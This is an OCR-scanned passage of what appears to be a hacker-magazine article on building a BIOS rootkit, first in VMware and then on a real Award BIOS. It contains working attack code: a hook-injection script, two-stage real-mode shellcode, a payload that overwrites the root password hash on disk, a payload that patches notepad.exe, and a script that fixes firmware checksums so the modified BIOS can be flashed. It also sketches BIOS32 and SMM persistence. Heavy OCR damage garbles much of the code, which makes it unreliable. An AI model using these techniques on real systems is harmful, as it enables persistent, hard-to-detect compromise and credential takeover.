as VMWare, at least for a first approach, because, as we’ll see, 
there are a lot of differences between the vmware version vs. the 
real hardware version. 


Sees [ 3.- BIOS Infection 
---[3.0 - Initial setup 


---[3.1 - VMWare’s (Phoenix) BIOS modification 


First, we have to obtain a valid VMWARE BIOS firmware to work on. 


5 


In order to read the EEPROM where the BIOS firmware is stored we 
need to run some code in kernel mode to let us send and receive 
data directly to the southbridge through the IO Ports. To do this, 
we also need to know some specific data about the current hardware. 
This data is usually provided by the vendor. Furthermore, almost 
all motherboard vendors provide some tool to update the BIOS, and 
very often, they have an option to backup or dump the actual 
firmware. 


In VMWare we can’t use this kind of tools, because th mulated 
hardware doesn’t have the same functionality as the real hardware. 
This makes sense... why would someone would like to update the 
VMWare BIOS from inside...? 


—--[3.1.1 - Dumping the VMWare BIOS 


When we started this, it was really helpful to have th mbedded 
gdb server that VMWare offers. This let us debug and understand 
what was happening. 

So in order to patch and modify some little pieces of code to start 
testing, we used some random byte arrays as patterns to find the 
BIOS in memory. 

Doing this we found that there is a little section of almost 256kb 
in vmware-vmx, the main vmware executable, called .bios440 

( that in our vmware version is located between the file offset 


PpPpvVNDYPDVYVDYPDYPYP VY YP YS 
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0x6276c7-0x65B994 ) that contains the whole BIOS firmware, in the 
same way as it is contained in a normal file ready to flash. 


You can use objdump to see the sections of the file: 
objdump —-h vmware-vmx 


And you can dump it to a file using the objcopy tool: 


objcopy -j .bios440 -O binary set-section-flags .bios440=a \ 
vmware-vmx bios440.rom.zl 


Umm... this means that... if we have root privileges in the victim 
machine, we could use our amazing power to modify the vmware-vmx 
executable, inserting our own infected bios and it will be 
executed each time a vmware starts, for every vmware of the 
computer. Sweet! 


But, there are simpler ways to accomplish this task. We are going 
to modify it a lot of times and it is not going to work most of 
the times so.. the simpler, the better. 


---[3.1.2 - Setting up VMWARE to load an alternate BIOS 


We found that VMWare offers a very practical way to let the user 
provide an specific BIOS firmware file directly through the .VMX 
configuration file. 


This not-so-known tag is called "bios440.filename" and it let us 
avoid using VMWare’s built-in BIOS and instead allows us to 
specify a BIOS file to use. 

You have to add this line in your .VMX file: 


bios440.filename = "path/to/file/bios.rom" 


And, voila!, now you have another BIOS firmware running in your VM, 
and in combination with: 


debugStub.listen.guest32 = "TRUE" or 
debugStub.listen.guest64 = "TRUE" 
that will leave the VMWare’s gdb stub waiting for your connection 


on localhost on port 8832. You will end up with an excellent -and 
completely debuggable- research scenery. Nice huh? 


Other important hidden tags that can be useful to define are: 


bios.bootDelay = "3000" To delay the boot X 
miliseconds 
debugStub.hideBreakpoints = "TRUE" Allows gdb breakpoints 
to work 
debugStub.listen.guest32.remote = "TRUE" For debugging from 
another machine (32bit) 
debugStub.listen.guest64.remote = "TRUE" For debugging from 
another machine (64bit) 
monitor.debugOnStartGuest32 = "TRUE" This will halt the VM 


at the very first 
instruction at OxFFFFO 


—---[3.1.3 - Unpacking the firmware 


As we mentioned before, some of the modules are compressed 
with an LZH variation. There are a few available tools to 
extract and decompress each individual module from the 
Firmware file. The most used are Phnxdeco and Awardeco (two 
excellent linux GPL tools) together with Phoenix BIOS Editor 
and Award BIOS editor (some non GPL tools for windows). 
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You can use Phoenix BIOS editor over linux using wine if you 
want. It will extract all the modules in a /temp directory 
inside the Phoenix BIOS editor ready to be open with your 
preferred disassembler. 


The great news about Phoenix BIOS Editor is that it can also 
rebuild the main firmware file. It can recompress and 
integrate all the different decompressed modules to let it 
just as it was at the beggining. 
T 
a 


he only thing is that it was done for older Phoenix BIOSes, 
nd it misses the checksum so we will have to do it by 
ourselves as we’ll see at 3.2.2.1 


Some of these tasks are done by isolated tools that can be 
invoked directly from a command line, which is very practical 
in order to automate the process with simple scripts. 


---[3.1.4 - Modification 


So, here we are. We have all the modules unpacked, and the 
possibility of modifying them, and then rebuild them in a 
fully working BIOS flash update. 


The first thing to deal with now is ‘’where to patch’. We can 
place a hook in almost any place to get our code executed but 
we have to think things through before deciding on where to 
patch. 


At the beginning we thought about hooking the first 
instruction executed by the CPU, a jump at OxFOOO:FFFO. It 
seemed to be the best option because it is always in the same 
place, and is easy to find but we have to take into 
consideration the execution context. To have our code running 
there should imply doing all the hardware initialization by 
ourselves (DRAM, Northbridge, Cache, PCI, etc.) 


For example, if we want to do things like accessing the hard 
drive we need to be sure that when our code gets executed it 
already has access to the hard drive. 


For this reason, and because it doesn’t change between 
different versions, we’ve chosen to hook the decompression 
routine. It is also very easy to find by looking for a 
pattern. It is uncompressed, and is called many times during 
the BIOS boot sequence letting us check if all the needed 
services are available before doing the real stuff. 


Here we have a dump script to quickly extract the firmware 
modules, assemble the payloads, inject it, and reassemble th 
modified firmware file. 


PREPARE.EXE and CATENATE.EXE are propietary tools to build 
phoenix firmware that you can find inside the Phoenix BIOS 
Editor and packaged with other flashing tools. 


In later versions of this script this tools arent needed anymore. 


seen at 3.2.2.1) 


#!/usr/bin/python import os,struct 


(as 


Decomp processing 
assemble the whole code to inject 
os.system(’nasm ./decomphook.asm’ ) 
decomphook = open(’decomphook’,’ rb’) .read() 
print "Leido hook: Sd bytes" % len (decomphook) 
minihook = '\x9a\x40\x04\x3b\x66\x90' # call near +0x430 
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Load the decompression rom 
decorom = open(’DECOMPCO.ROM.orig’,’rb’).read() 


Add the hook 
hookoffset=0x23 
decorom = decorom[:hookoffset]+tminihook+decorom[len(minihook) thookoffset: ] 


#Add the shellcode 
decoromt="\x90"*100+decomphook 
decorom=decorom+’ \x90’ *10 


#recalculate the ROM size 
decorom=decorom[:0xf]+struct.pack ("<H", len (decorom) -0x1A)+decorom[0x11:] 


#Save the patched decompression rom 
out=open (’ DECOMPCO.ROM’ ,’ wh’ ) 

out .write (decorom) 

out.close() 


#Compile 

print "Prepare..." 
os.system(’./PREPARE.EXE ./ROM.SCR.ORIG’ ) 
print "Catenate..." 
os.system(’./CATENATE.EXE ./ROM.SCR.ORIG’ ) 
os.system(’rm *.MOD’) 


---[3.1.5 - Payload 


Before talking about the payload, we have to resolve *where* 
are we going to store our payload, and this is not a trivial 
task. We found that there is a lot of padding space at the end 
of the decompression routine that, when allocated, will be 
used as a buffer to hold the decompressed code. Trashing in 
this way, any code that we can store there. This adds a bit of 
complexity to the payload, because it makes us split the 
shellcode in two stages. 


The first one gets executed by setting a very typical hook in 
the prolog of the decompression routine. A simple relative 
call that redirects the execution flow to our code and moves 
the second stage to a safe hardcoded place that we know 
r 
t 
i 


emains unused during the whole boot process. Then, updates 
he hook making it point to the new address and executes the 
nstructions smashed by the original call 


DECOMPRESSION BLOCK 


First Stage Payload 

(Moves second stage 
to a safe place 

and updates the hook) 


V--<-+ Code smashed by hook 


Second Stage Payload 
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BITS 16 


Extent to search (in 64K sectors, aprox 32 MB) 
Sdefine EXTENT 10 


~‘e 


start_mover: 


;save regs 
;jmp start_mover 
pusha 
pusht 


; set dst params to move the shellcod 
XOr aX, ax 

xor di, di 

xor si, si 

push cs 

pop ds 

mov eS, ax ; seg_dst 

mov di, Ox8000 ; off_dst 

mov cx, Oxff ; code_size 


get_eip to have the ’source’ address 
call b 


~“e 


pop si 
add si, 0x25 (Offset needed to reach the second stage payload) 
rep movsw 


mov ax, word [esp+0Oxl2] ; get the caller address to patch the original hook 
sub ax, 4 

mov word [eax], 0x8000 ; new_hook offset 

mov word [eax+2], 0x0000 ; new_hook segment 


; restore saved regs 
popf 
popa 


; execute code smashed by ’call far’ 
;MOV e€S,ax 

mov bx,es 

mov fs,bx 

mov ds, ax 

retf 


;Here goes a large nopsled and next, the second stage payload 


The second stage, now residing in an unused space, has got to 
have some ready signal to know if the services that we want to 
use are available.. 


—--[3.1.5.1 - The Ready Signal 


In the VMWare we’ve seen that when our second-stage payload is called, 
and the IVT is already initialized, we have all we need to do our 
stuff. Based on that we chose to use the IVT initialization as our 
ready signal. This is very simple because it’s always mapped at 
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0000:0000. Every time the shellcode gets executed first checks if the 
IVT is initialized with valid pointers, if it is the shellcode is 
executed, if not it returns without doing anything. 


So [3.12534 = ‘The Réal:. ‘stutt 


Now we have our code executed and we know that we have all the 
services we need so what are we going to do? We can’t interact with 
the OS from here. 


In this moment the operating system is just a char array sitting on 
the disk. But hey! wait, we have access to the disk through the int 
13h (Low Level Disk Services)... we can modify it in any way we want!. 
Ok, let’s do it. 


In a real malicious implementation, you would like to code some sort 
of basic driver to correctly parse the different filesystem 
structures, at least for FAT & NTFS (maybe reusing GRUB or LILO code?) 
but for this paper, just as Proof of Concept, we will use the Int 13h 
to sequentially read the disk in raw mode. We will look for a pattern 
in a very stupid way and it will work, but doing what we said before, 
in a common scenery, will be possible to modify, add and delete any 
desired file of the disk allowing an attacker to drop driver modules, 
infect files, disable the antivirus or anti rootkits, etc. 


This is the shellcode that we’ve used to walk over the whole 
disk matching the pattern: "root:$" in order to find the root 
entry of the /etc/passwd file. 


Then, we replace the root hash with our own hash, setting the 
password "root" for the root user. 


; The shellcode doesn’t have any type of optimization, we tried to keep it 
; Simple, ’for educational purposes’ 


; 16 bit shellcode 
; use LBA disk access to change root password to ‘root’ 


BITS 16 
push es 
push ds 
pushad 
pusht 


; Get code address 
call gca 
gca: pop bx 


7 construct DAP 
push cs 

pop ds 

mov si,bx 


add si,0xle0O ; DAP OxleO from code 
mov cx,bx 

add cx,0x200 ; Buffer pointer 0x200 from code 
mov byte [si],16 ;size of SAP 

inc si 

mov byte [si],0 ;reserved 

inc si 

mov byte [si],1l ;number of sectors 
inc si 

mov byte [si],0 ;unused 

inc si 

mov word [si],cx ;buffer segment 
add si,2 

mov word [si],ds;buffer offset 
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add si,2 
mov word [si],0 ; sector number 
add si,2 
mov word [si],0 ; sector number 
add si,2 
mov word [si],0 ; sector number 
add si,2 
mov word [si],0 ; sector number 


mov ax,word [si] 
inc ax 
mov word [si],ax 
cmp ax, 0 
jne incend 
add si,2 
loop loopinc 
incend: 
: LBA extended read sector 
mov ah,0x42 ; call number 
mov dl,0x80 ; drive number 0x80=first hd 
mov si,bx 
add si,0xle0 
int 0x13 
jc mainend 
nop 


PaaS sass Search for ’root’ 

mov di,bx 

add di,0x200 ; pointer to buffer 
mov cx,0x200 ; 512 bytes per sector 
searchloop: 

cmp word [di],’ro’ 

ne notfound 
mp word [dit2],’ot’ 
ne notfound 
mp word [dit+4],’:S’ 

ne notfound 

mp found ; root found! 


(Ces Pa ed as em ml ace Pr ed 


notfound: 
inc di 
loop searchloop 


endSearch: 


pop si 
pop di 


inc di 

cmp di,0 

jne mainloop 
inc si 
cmp si,3 
jne mainloop 


mainend: 
popf 
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7.txt 
popad 
pop ds 
pop es 
int 3 
found: 


; replace password with: 
;root:$2aS08SGrx5rDVeDJ 9AXX1XOobf fFOkLOnFyRjJk2N0/4S8Yup33sD43wSHFzi: 


;Yes we could’ve 
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used rep movsb, but we kinda suck. 


dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 
dit 


+6] 
+8 ] 
+10 
+12 
+14 
+16 
+18 
+20 
+22 
+24 
+26 
+28 
+30 
+32 
+34 
+36 
+38 
+40 
+42 
+44 
+46 
+48 
+52 
t54 
+56 
+58 
+60 
+62 
+64 


LBA 


pi 2a 
,' SO’ 
1/88 
7 GE 
Page aD) 
,'’Vve 
ri Dd 
,'9A 
ESS 
a LX 
,'Oo 
71 .DE 
pe EO. 
eo RL 
,’On 
,'Fy 
,’RI 
Pek2 
,’NO 
1'/4 
,’S8 
Pema Ge 
,'p3 
738 
,'D4 
,'3w 
7 SH 
eZ 


, . 
yt AS 


, 


i 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


, 


xtend 


Ov 
Ov 


omer 
omnen 


3 
O 


ah, Ox 
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43 


80 


’ 


1, 


si, 0OxleOd 


0x13 
maine 


nd 


d write sector 


call number 
; no verify 
drive number 0x80=first hd 


This other is basically the same payload, but in this case we walk 
over the whole disk trying to match a pattern inside notepad.exe, and 
then we inject a piece of code with a simple call to MessaBoxA and 


hook_start: 


nop 
nop 
nop 
nop 
nop 
nop 
nop 
nop 
nop 
nop 
nop 
nop 
nop 


ExitProcess to finish it gracefully. 
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7jmp hook_start 
;mov bx,es 

;mov fs,bx 

;mov ds,ax 
;retf 


pusha 

pushft 

xor di,di 

mov ds,di 

; check to see if int 19 is initialized 
cmp byte [0x19*4],0x00 

jne ifint 


noint: 
;jmp noint ; loop to debug 
popt 
popa 
;mOV ES, ax 
mov bx, es 
mov fs, bx 
mov ds, ax 
retf 
ifint: 
;jmp ifint ; loop to debug 
cmp byte [0x19*4],0x46 
je noint 
(A 
initShellcode: 
;jmp initShellcode ; DEBUG 
oulkab 
push es 
push ds 
pushad 
pusht 


; Get code address 
call gca 


gca: 
pop bx 
f Set screen mod 
mov ax,0x0003 
int 0x10 
aS SS SSS construct DAP 


mov si,bx 

add si,0x2e0 ; DAP O0x2e0 from code 

mov cx,bx 

add cx,0x300 ; Buffer pointer 0x300 from code 


mov byte [si],16 ;size of SAP 
inc si 

mov byte [si],0 ;reserved 

inc si 

mov byte [si],1l ;number of sectors 
inc si 

mov byte [si],0 ;unused 

inc si 

mov word [si],cx ;buffer segment 
add si,2 

mov word [si],ds;buffer offset 
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add si,2 
mov word [si],0 ; sector number 
add si,2 
mov word [si],0 ; sector number 
add si,2 
mov word [si],0 ; sector number 
add si,2 
mov word [si],0 ; sector number 


SSS Function 41h: Check Extensions 
push bx 

mov ah,0x41 ; call number 

mov bx,0x55aa; 

mov dl,0x80 ; drive number 0x80=first hd 
int 0x13 

pop bx 

jc mainend_near 

po Se Function 00h: Reset Disk System 
mov ah, 0x00 

int 0x13 

jc mainend_near 

jmp mainloop 

mainend_near: 
jmp mainend 
mainloop: 


Gl 
~~ 


jocc---c progress bar (ABCDE.... 


add al,0x41 
mov bx,0 


int 0x10 
pop bx 
nochar: 
push di 
push si 
;jmp incend ; 
poccc--- Inc sector number 
mov cx,3 
mov si,bx ; bx = curr_pos 


add si,0x2e8 ; +2e8 LBA Buffer 


mov ax,word [si] 
inc ax 

mov word [si],ax 
cmp ax, 0 

jne incend 

add si,2 

loop loopinc 


incend: 
LBA_read: 
;jmp int_test 
: LBA extended read sector 


mov ah,0x42 ; call number 

mov dl,0x80 ; drive number 0x80=first hd 
mov si,bx 

add si,0x2e0 


int 0x13 
jne int13_no_err 
; Writ rror character 


push bx 
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mov ax,0x0e45 
mov bx,0x0000 
int 0x10 
pop bx 
int1l3_no_err: 
j= S Search for ’root’ 
mov di,bx 
add di,0x300 ; pointer to buffer 
mov cx,0x200 ; 512 bytes per sector 


searchloop: 

cmp word [di],0x706a 
jne notfound 
cmp word [dit+2],0x9868 
jne notfound 


e debugme 
p word [dit4],0x0018 
e notfound 
cmp word [dit+6],0xe801 
e 
p 


notfound 
found ; root found! 


notfound: 
inc di 
loop searchloop 


endSearch: 
pop si 
pop di 


inc di 

cmp di,0 

jne mainloop 
TANG. JS. 
cmp si,EXTENT ;------------ 10x65535 sectors to read 
jne mainloop 

jmp mainend 


exit_error: 
pop si 
pop di 


mainend: 
popt 
popad 
pop ds 
pop es 
sti 


popf 
popa 
mov bx, es 
mov fs, bx 
mov ds, ax 
retf 


writechar: 
push bx 
mov ah,0x0e 
mov bx,0x0000 
int 0x10 
pop bx 
ret 

found: 
mov al,0x46 
call writechar 
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;mov word[di], Oxfeeb ; Infinite loop - Debug 
ov word[di], O0x00be 

ov word[dit+2], 0x0100 
ov word[dit4], O0xc700 
ov word[dit+6], 0x5006 
ov word[dit+8], 0x4e57 
ov word[dit+10], 0xc744 
ov word[dit12], 0x0446 
ov word[dit+1l4], 0x2121 
ov word[dit+16], 0x0100 
ov word[dit18], 0x0l6a 
ov word[dit+20], 0x006a 
ov word[dit22], 0x6a56 
ov word[dit+24], Oxbe00 
ov word[dit+26], 0x050b 
ov word[dit+28], 0x77d8 
ov word[dit+30], Oxd6ff 
ov word[dit+32], 0x00be 
ov word[dit+34], 0x0000 
ov word[dit+36], 0x5600 
ov word[dit+38], Oxa2be 
ov word[dit+40], Ox8lca 
ov word[dit42], Oxff7c 
ov word[dit44], 0x90d6 


SBB838B35B5B535353 335333333338 8sx8sx8:8sx8 88 


: LBA extended write sector 

ov ah,0x43 ; call number 

ov al,O ; no verify 

ov dl1l,0x80 ; drive number 0x80=first hd 
ov si,bx 

add si,0x2e0 

int 0x13 

jmp notfound; continue searching 

nop 


---[3.2 - Real (Award) BIOS modification 


VMWare turned to be an excellent BIOS research and development 
platform. But to complete this research, we have to attack a real 
system. For this modification we used a common motherboard (Asus 
A7V8X-MX), with an Award-Phoenix 6.00 PG BIOS, a very popular version. 


---[3.2.1 - Dumping the real BIOS firmware 


FLASH chips are fairly compatible, even interchangeable. But they are 
connected to the motherboard in many different ways (PCI, ISA bridge, 
etc.), and that makes reading them in a generic way a non-trivial 
problem. How can we make a generic rootkit if we can’t even find a 
way to reliably read a flash chip? Of course, a hardware flash reader 
is a solution, but at the time we didn’t have one and is not really an 
option if you want to remotely infect a BIOS without physical access. 


So we started looking for software-based alternatives. The first tool 
that we found worked fine, which was the Flashrom utility from the 
coreboot open-source project, s [COREBOOT] (Also available in the 
Debian repositories). It contains an extensive database of chips and 
read/write methods. We found that it almost always works, even if you 
have to manually specify the IC model, as it’s not always 
automatically detected. 


S$ flashrom -r mybios.rom 


Generally, the command above is all that you need. The bios should be 
in the mybios.rom file. 


A trick that we learned is that if it says that it can’t detect the 
Chip, you should do a script to try every known chip. We have yet to 
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find BIOS that can’t be read using this technique. Writing is slightly 
more difficult, as Flashrom needs to correctly identify the IC to 
allow writing to it. This limitation can by bypassed modifying the 
source code but beware that you can fry your motherboard this way. 


We also used flashrom as a generic way to upload the modified BIOS 
back to the motherboard. 


---[3.2.2 - Modification 


Once we have the BIOS image on our hard disk, we can start the process 
of inserting the malicious payload. 


When modifying a real bios, and in particular an award/phoenix BIOS, we 
faced some big problems: 

1) Lack of documentation of the bios structure 

2) Lack of packing/unpacking tools 

3) No easy way to debug real hardware. 


There are many free tools to manipulate BIOS, but as it always happen 
with proprietary formats, we couldn’t find one that worked with our 
particular firmware. We can cite the Linux awardeco and phnxdeco 
utilities as a starting point, but they tend to fail on modern BIOS 
versions. 


Our plan to achieve execution was: 
1) We must insert arbitrary modifications (this implies the 
knowledge of checksum positions and algorithms) 
2) A basic hook should be inserted on a generic, easy to 
find portion of the BIOS. 
3) Once the generic hook is working, then a Shellcode could be 
inserted. 


---[3.2.2.0 - Black Screen of Death 


You have to know that you’re going to trash a lot of BIOS chips in 
this process. But most BlOSes have a security mechanism to restore a 
damaged firmware. RIFM (Read the friendly manual of the motherboard) 


If this doesn’t work, you can use the chip hot-swapping technique: You 
boot with a working chip, then you hot-swap it with the damaged one, 
and reflash. Of course, for this technique you will need to have 
another working backup BIOS. 


---[3.2.2.1 - Changing one bit at time 


Our initial attempts were unsuccessful and produced mostly unbootable 
systems. Basically we ignored how many checksums the bios had, and you 
must patch everyone of them or face the terrifying "BIOS CHECKSUM 
ERROR" black screen of death. The black screen of death got us 
hinking, it says "CHECKSUM" so, it must be some kind of addition 
ompared to a number. And this kind of checks can be easily bypassed, 
njecting a number at some point that will *compensate* the addition. 
sn’t this the reason why CRC was invented after all? It turns out 
hat all the checksums were only 8-bits, and by touching only one byte 
t the end of the shellcode, all the checksums were compensated. You 
an find the very simple algorithm to do this on the attachments, 
nside this python script: 


HBOS tHEHEACE 


modifBios.py 


!/usr/bin/python 
import os,sys,math 


Usage 
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if len(sys.argv) <3: 
print "Modify and recalculate Award BIOS checksum" 
print "Usage: %S <original bios> <assembly shellcode 
file>" % (sys.argv[0]) 
exit (0) 


# assembly the file 
scasm = sys.argv[2] 


sccom = "%$s.bin" % scasm 

os.system("nasm %S -o %S " % (Sscasm,Sccom) ) 
shellcode = open(sccom,’ rb’) .read() 

shellcode = shellcode[0xb55:] # skip the NOPs 


os.unlink (sccom) 
print ("Shellcode lenght: %d" % len(shellcode) ) 


# Make a copy of the original BIOS 


modifname = "%s.modif" % sys.argv[1] 
origname = sys.argv[1] 


os.system("cp Ss 38S" % (origname,modifname) ) 


#merge shellcode with original flash 
insertposition = 0x3af75 

modif = open(modifname,’ rb’) .read() 

os.unlink (modifname) 
newbios=modif[:insertposition] 
newbiost=shellcod 

newbiost=modif [insertpositiontlen (shellcode) :] 
modif=newbios 

#insert hook 

hookposition = 0x3a4ld 

hook="\xe9\x55\x0b" here is our hook, 

at the end of the bootblock 
newbios=modif [:hookposition] 

newbiost+=hook 

newbiost=modif [hookposition+len (hook) :] 
modif=newbios 


read original flash 
orig = open(sys.argv[1],’rb’).read() 


calculate original and modified checksum 
Sorry, this script is not *that* generic 
you will have to harvest these values 
manually, but you can craft an automatic 
one using pattern search. 

These offsets are for the Asus A7V8X-MX 
Revision 1007-001 


start_of_decomp_b1k=0x3a400 
start_of_compensation=0x3affc 
end_of_decomp_b1k=0x3b000 


ochksum=0 original checksum 
mchksum=0 modified checksum 


for i in range(start_of_decomp_blk, start_of_compensation) : 
ochksumt=ord (orig[i]) 
mchksum+=ord (modif [i] ) 

print "Checksums: Original= %08X Modified= %08X" % (ochksum,mchksum) 


# calculate difference 
chkdiff = (mchksum & Oxff) - (ochksum & Oxff) 
print "Diff : %08X" % chkdiff 


# balance the checksum 
newbios=modif [:start_of_compensation] 
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newbiost=chr( (Oxl1FF-chkdiff) & Oxff ) 
newbios+=modif [start_of_compensation+l: ] 


mchksum=0 modified checksum 
ochksum=0 modified checksum 
for i in range(start_of_decomp_blk,end_of_decomp_b1lk): 
ochksumt=ord (orig[i]) 
mchksum+=ord (newbios[i]) 
print "Checksum: Original = %08X Final= %08X" % (ochksum,mchksum) 
print "(Please check the last digit, must be the same in both checkums)" 


newbiosname=sys.argv[2]+".compensated" 
w=open (newbiosname, ’ wb’ ) 

w.write (newbios) 

w.close() 

print "New bios saved as %s" % newbiosname 


With this technique we successfully changed one bit, then one byte, then 
multiple bytes on a uncompressed region of the BIOS. The first step was 
accomplished. 


—---[3.2.2.1 - Inserting the Hook 


The hook is in exactly the same place: the decompressor block. We 
also jumped to the same place that in the VMWARE code injection: In 
the end of the decompressor block generally there is enough space to 
do a pretty decent first stage shellcode. It’s easy to find. Hint: 
look for "= Award Decompression Bios =" In Phoenix bios, is the block 
marked as "DECOMPCODE" (using phnxdeco or any other tool). It almost 


never changes. It works. 


There are a couple of steps that you must do to ensure that you are 
hooking correctly. Firstly, insert a basic hook that only jumps 
forward, and then returns. Then, modify it to cause an infinite loop. 
(we don’t have a debugger so we must rely on these horrible 
techniques) If you can control when the computers boots correctly and 
when it just locks up, congratulations. Now you have your code 
stealthy executing from the BIOS. 


---[3.2.3 - Payload 


So now, you have complete control of the BIOS. Then you unveil your 
elite 16-bit shellcoding skills and try to use the venerable INT 10h 
to print "I PWNED J00!" on the screen and then proceed to use INT 13h 
to write evil things to the hard disk. 


Not that fast. You will be greeted with the black screen of fail. 


What happens is that you still don’t have complete control of the 
BIOS. First and foremost, as we did on the VMWARE hook, you are 
gaining execution multiple times during the boot process. The first 
time, the disk is not spinning, the screen is still turned off and 
most surprisingly, the Interruption Vector Table is not initialized. 
This sounds very cool but it is a big problem. You can’t write to the 
disk if it’s not spinning, and you can use an interrupt if the IVT is 
not initialized. 


You must wait. But how do you know when to execute? You again need some 
sort of ready-to-go signal. 


—---[3.2.3.1 - The Ready Signal 


In the VMWARE, we used the contents of the IVT as a ready signal. The 
shellcode tested if the IVT was ready simply by checking if it had the 
correct values. This was very easy because in real-mode, the IVT is 
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always in the same place (0000:0000, easy to remember by the way). 
This technique basically sucks, because you really can’t get less 
generic than this. The pointers on the IVT change all the time, even 
between versions of the same BIOS manufacturer. We need a better, 
more "works-on-other-computers-—apart—from-mine" technique. 


In short, this is the solution and it works great: 
Check if C000:0000 contains the signature AA5D5h. 


If that conditions is true, then you can execute any interruption. The 
reason is that in this precise position the VGA BIOS is loaded on all 
PCs. And AA55h is a signature that tell us that the VGA BIOS is 
present. It’s fine to assume that if the VGA BIOS has been loaded, 
then the IVT has been initialized. Warning: Surely the hard disk is 
not spinning yet! (It’s slow) but now you can check for it with the 
now non-crashing interruption 13h, using function 41h to check for LBA 
extensions and then trying to do a disk reset, using function 00h. You 
can s an example of this on the shellcode of the section 3.1.5.1 


The rest is history. You can use int 13h with LBA to check for the 
disk, if it’s ready, then you insert a disk-stage rootkit on it, or 
insert an SMBIOS rootkit (see [PHRACK65]), or bluepill, or the 
I-Love-You virus, or whatever rocks you. Your code is now immortal. 


For the record, here is a second shellcode: 


7Skull.asm please use nasm to assemble 
BITS 16 
back: 

TIMES 0x0b55 db 0x90 


begin2: 
ha 
hf 
h es 
h ds 


pu 
pu 
pu 
pu 


nnn wn 


push 0xc000 

pop ds 

cmp word [0],0xaa55 
je print 


volver: 

pop ds 
pop es 
popt 
popa 
pushad 
push cx 
jmp back 


print: 
jmp start 


;message 
‘ 123456789 
msg: dbo! .---.',13,10,\ 
vay MLS ON 
EO) ep 37 LOe \ 
M102...) Cpl Sy 00\ 
POSS [6135-105 
Bo Vega 9 Vs 
times 55-Stmsg db ’ ’ 


start: 
;geteip 
call getip 
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getip: 
pop dx 


;init video 
mov ax,0003 
int 0x10 


;video write 
mov bp, dx 
sub bp,58 ; message 


;write string 
mov ax,0x1300 
mov bx,0x0007 
mov cx,53 

mov dx,0x0400 
push cs 

pop es 

int 0x10 


call sleep 
jmp volver 


mov cx, Oxfff 


push cx 
mov cx,Oxffff 


loop 12 


=== 4.- BIOS32 (Kernel direct infection) 


Now you have your bios rootkit executing in BIOS, but being in BIOS 
sucks from an attacker’s point of view. You ideally want to be in the 
kernel of the Operative System. That is why you should do something 
like drop a shellcode to hard-disk or doing an SMBIOS-rootkit. But 


what if the hard-disk is encrypted? Or if the machine really doesn’t 
have a hard disk and boots from the network? 


Fear not, because this section is for you. There is the misconception 
that the BIOS is never used after boot, but this is untrue. Operativ 
Systems make BIOS calls for many reasons, like for example, setting 

video modes (Int 10h) and doing other funny things like BIOS-32 calls. 


What is BIOS32? using Google-based research we concluded that is an 
arcane BIOS service to provide information about other BIOS services 
to modern 32-bit OSes, in an attempt by BIOS vendors to stay relevant 
on the post MS-DOS era. You can refer to [BIOS32SDP] for more 
information. What’s important is that many OSes make calls to it, and 
the only requirement to being a BIOS32 service is that you must place 
a BIOS32 header somewhere in the E000:0000 to FOOO:FFFF memory region, 
16-byte aligned. The headers structure is: 


Offset Bytes Description 
0 4 Signature "_32_" 


4 4 Entry point for the BIOS32 Service (here you put a pointer 


to your stuff) 


8 1 Revision level, put 0 

9 1 Length of the BIOS32 Headers in paragraphs (put 1) 
10 1 8-bit Checksum. Security FTW! 

11 5 Reserved, put Os. 
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This is a pattern on all BIOS services. The way to locate and execut 
services is a pattern search followed by a checksum, and then it just 
jumps to a function that is some kind of dispatcher. This behavior is 
present in various BIOS functions like Plug and Play (S$PnP), Post 
Memory Manager ($PMM), BIOS32 (_32_), etc. Security was not 
considered at the time when this system was designed, so we can take 
advantage of this and insert our own headers (We can even use an 
option-rom from this, without modifying system BIOS), and the OS 
ultimately always trust the BIOS. 


You can see how Linux 2.6.27 detects and calls this service on the 
kernel function: 


arch/x86/pci/pcibios.c, check_pcibios() 


if ((pcibios_entry = bios32_service(PCI_SERVICE))) { 
pci_indirect.address = pcibios_entry + PAGE_OFFSET; 


3 


local_irq_save (flags) ; 

__asm__ ( 
"loall *(%%edi); cld\n\t" <--- Pwn point 
Whe LE \n\t" 


OpenBSD 4.5 does the same her 


sys/arch/i386/i386/bios.c,bios32_service() 
int 
bios32_service (u_int32_t service, bios32_entry_t e, bios32_entry_info_t ei) 


{ 


base = 0; 
__asm __volatile("lcall *(%4)" <-- Pwn point 
: "+a" (service), "+b" (base), "=c" (count), "=d" (off) 


"D" (&bios32_entry) 
"Sesi", "co", "memory") ; 


At the moment we don’t have any data on Windows XP/Vista/7 
BIOS32-direct-calling, but please refer to the presentation [JHeasman] 
where it documents direct Int 10h calling from several points on the 
Windows kernel. 


Faking a BIOS32 header or modifying an existing one is a viable way to 
do direct-to-kernel binary execution, and more comfortable than the 
int 10 calling (we don’t need to jump to and from protected mode), 
without having to rely on weird stuff like we explained on section 2 
and 3. 

Unfortunately because of lack of time, we couldn’t provide a BIOS32 
infection vector PoC in this issue, but it should be relatively easy 
to implement, you now have all the tools to do it safely inside a 
virtual machine, like VMware. 


—----- 5.- Future and other uses 


Bios modification is a powerful attack technique. As we said before, 
if you take control of the system at such an early stage, there is 
very little that an anti-virus or detection tool can do. Furthermore, 
we can stay resident using a common boot-sector rootkit, or file 
system modification. But some of the more fun things that you can do 
with this attack is to drop a more sophisticated rootkit, like a 
virtualized one, or better, a SMM Rootkit. 


---[5.1 - SMM! 


The difficulty of SMM Rootkits relies on the fact that you can’t 
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touch the SMRAM once the system is booted, because the BIOS sets 
the D_LCK bit [PHRACK65]. Recently many techniques has been 
developed to overcome this lock, like [DUFLOTSM], but if you are 
executing in BIOS, this lock doesn’t affect you, because you are 
executing before this protection, and you could modify the SMRAM 
directly on the firmware. However, this technique would be very 
difficult and not generic at all, but it’s doable. 


foe Signed firmware 
The huge security hole that is allowing unsigned firmware into 
a motherboard is being slowly patched and many signed BIOS 
systems are being deployed, s [JHeasman2] for examples. 
This gives you an additional layer of security and prevent 
exactly the kind of attack proposed in this article. 
However, no system is completely secure, bug and backdoors 
will always exist. To this date no persistent attack on 
signed bios has been made public, but researchers ar 
close to beating this kind of protections, s for exampl 
[ILTXT]. 


-—--[5.3 - Last words 


Few software is so fundamental and at the same time, so closed, 
as the BIOS. UEFI [UEFIORG], the new firmware interface, promises 
open-standards and improved security. 

